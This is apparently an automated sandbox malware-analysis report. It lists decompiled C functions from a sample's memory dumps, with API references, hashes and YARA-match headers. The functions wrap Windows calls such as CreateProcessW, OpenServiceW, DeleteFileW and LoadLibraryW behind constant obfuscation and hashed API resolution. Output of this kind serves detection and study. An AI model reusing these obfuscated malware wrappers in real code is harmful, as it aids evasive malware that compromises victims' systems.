                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: baafa9778dc446369fdbbf24d4533c3815a7610ac10221fdb0ab2357abce437a
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 611133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00251000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0025602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002607A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00251096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: fdf4071e261dd71de8bb037cab8b5bf1dfdc30cb7bde443b759affbe5f02278a
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 2C015BB6D01308BBDF04DF94C94A5DEBBB1EB54318F108188E41466291D3B19B689B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00254859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002607A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002548B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: cd5c2410cb2683136d7d70b5a3a887321da5486bcd2c2a1e36389db571b024c3
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 26F017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00264F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0025602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002607A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00264FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 25c7f53960982c4511406ae7b859bcf28ff628bb3fc7f76f008355ad4f77eeea
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 54F037B081120CFFDB04EFA4D98689EBFBAEB40300F208199E804AB250D3715B54AB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0026976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0025602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002607A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0025591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0025591A), ref: 00269816
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 6edb69648b3f94e7e03f1beca71628678257b7b9f364a73f49670ed32773ee0c
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8D11B372911148BBDF1A9F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0025B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0025602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002607A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00260668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00260668,?,?,?,?), ref: 0025B5FD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0026981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0025602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002607A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002587F2,0000CAAE,0000510C,AD82F196), ref: 0026989B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00267BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0025602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002607A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00267C67
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0025F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0025602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002607A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0025F6D8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0025B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0025602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002607A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0025B759
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0026AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0025602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002607A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0026AAA8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00255FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0025602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002607A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00256025
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E002D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E002D602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002D29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: c638c432c40ddb02de9cd7892f1b44e95816461b69e2a8d3fafd893ec86d0a10
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 8A016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E002DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E002D602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002DC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: db3ae95af8c4c9ebda3dfdfc0c3d152282b53258ce6c4d73ac6c5c6800bdf77a
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 821122B290122DBBCB259F95DC498EFBEB8EF04714F108188B90962210D3B14A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E002D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E002D602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 002D1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 6fd2fd3ccfee7344cb4ac8b8896a3058e99056bc09d58c8258d7b5415594f2a1
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: DB015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E002D4859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002D48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 86ba2a0eb99778ba98e78ab0eda91687ba8772f974a2f1b7d80c559873d617bc
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7BF017B0A55209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F519B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E002E4F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E002D602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
